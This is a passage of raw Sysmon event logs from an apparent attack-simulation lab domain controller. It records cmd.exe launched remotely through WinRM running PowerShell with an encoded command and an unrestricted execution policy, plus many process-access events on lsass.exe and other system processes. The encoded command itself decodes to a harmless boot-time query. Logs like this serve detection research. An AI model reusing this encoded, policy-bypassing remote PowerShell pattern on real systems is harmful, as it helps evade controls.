KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUAC:\Users\Administrator\ATTACKRANGE\Administrator{733EE690-3DD8-5F80-7BEE-110000000000}0x11ee7b0HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{733EE690-3DD8-5F80-1503-000000007E01}4916C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUA 10341000x8000000000000000647Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:20.656{733EE690-3C66-5F80-0B00-000000007E01}864584C:\Windows\system32\lsass.exe{733EE690-3C69-5F80-1400-000000007E01}1332C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000646Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:20.656{733EE690-3DD8-5F80-1403-000000007E01}36284572C:\Windows\system32\conhost.exe{733EE690-3DD8-5F80-1503-000000007E01}4916C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000645Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:20.656{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000644Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:20.656{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000643Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:20.656{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000642Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:20.656{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000641Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:20.656{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000640Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:20.656{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000639Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:20.656{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000638Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:20.656{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000637Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:20.656{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000636Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:20.656{733EE690-3C5B-5F80-0500-000000007E01}6401216C:\Windows\system32\csrss.exe{733EE690-3DD8-5F80-1503-000000007E01}4916C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000635Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:20.656{733EE690-3DD8-5F80-1303-000000007E01}25924804C:\Windows\system32\WinrsHost.exe{733EE690-3DD8-5F80-1503-000000007E01}4916C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\WinrsHost.exe+2c94|C:\Windows\system32\WinrsHost.exe+2eb1|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+7d09|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+b42b|C:\Windows\System32\combase.dll+53b8c|C:\Windows\System32\combase.dll+53842|C:\Windows\System32\combase.dll+51968|C:\Windows\System32\combase.dll+4fedd|C:\Windows\System32\combase.dll+4f5bf|C:\Windows\System32\combase.dll+6da09|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5982e|C:\Windows\System32\RPCRT4.dll+39257|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb 154100x8000000000000000634Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:20.658{733EE690-3DD8-5F80-1503-000000007E01}4916C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUAC:\Users\Administrator\ATTACKRANGE\Administrator{733EE690-3DD8-5F80-7BEE-110000000000}0x11ee7b0HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{733EE690-3DD8-5F80-1303-000000007E01}2592C:\Windows\System32\winrshost.exeC:\Windows\system32\WinrsHost.exe -Embedding 10341000x8000000000000000633Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:20.656{733EE690-3C66-5F80-0B00-000000007E01}864584C:\Windows\system32\lsass.exe{733EE690-3C69-5F80-1400-000000007E01}1332C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000632Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:20.656{733EE690-3C66-5F80-0B00-000000007E01}864584C:\Windows\system32\lsass.exe{733EE690-3C69-5F80-1400-000000007E01}1332C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000631Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:20.640{733EE690-3C66-5F80-0B00-000000007E01}864584C:\Windows\system32\lsass.exe{733EE690-3C69-5F80-1400-000000007E01}1332C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000630Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:20.640{733EE690-3C69-5F80-1400-000000007E01}13321784C:\Windows\system32\svchost.exe{733EE690-3DD8-5F80-1303-000000007E01}2592C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\winrscmd.dll+8d36|C:\Windows\system32\winrscmd.dll+92d5|C:\Windows\system32\winrscmd.dll+af31|C:\Windows\system32\winrscmd.dll+23dc|c:\windows\system32\wsmsvc.dll+155ac7|c:\windows\system32\wsmsvc.dll+13f76d|c:\windows\system32\wsmsvc.dll+13f3cf|c:\windows\system32\wsmsvc.dll+13fcb2|c:\windows\system32\wsmsvc.dll+9ab10|c:\windows\system32\wsmsvc.dll+9b611|c:\windows\system32\wsmsvc.dll+4495|c:\windows\system32\wsmsvc.dll+16816c|c:\windows\system32\wsmsvc.dll+1689b8|c:\windows\system32\wsmsvc.dll+16345b|c:\windows\system32\wsmsvc.dll+163125|c:\windows\system32\wsmsvc.dll+14ce9c|c:\windows\system32\wsmsvc.dll+130049|c:\windows\system32\wsmsvc.dll+13571a|c:\windows\system32\wsmsvc.dll+12f47e|c:\windows\system32\wsmsvc.dll+125587|c:\windows\system32\wsmsvc.dll+11f562|c:\windows\system32\wsmsvc.dll+124574 10341000x8000000000000000629Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:20.640{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD8-5F80-1303-000000007E01}2592C:\Windows\system32\WinrsHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000628Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:20.625{733EE690-3DD8-5F80-1403-000000007E01}36284572C:\Windows\system32\conhost.exe{733EE690-3DD8-5F80-1303-000000007E01}2592C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000627Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:20.625{733EE690-3C5B-5F80-0500-000000007E01}6401216C:\Windows\system32\csrss.exe{733EE690-3DD8-5F80-1403-000000007E01}3628C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000626Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:20.625{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000625Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:20.625{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000624Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:20.625{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000623Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:20.625{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000622Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 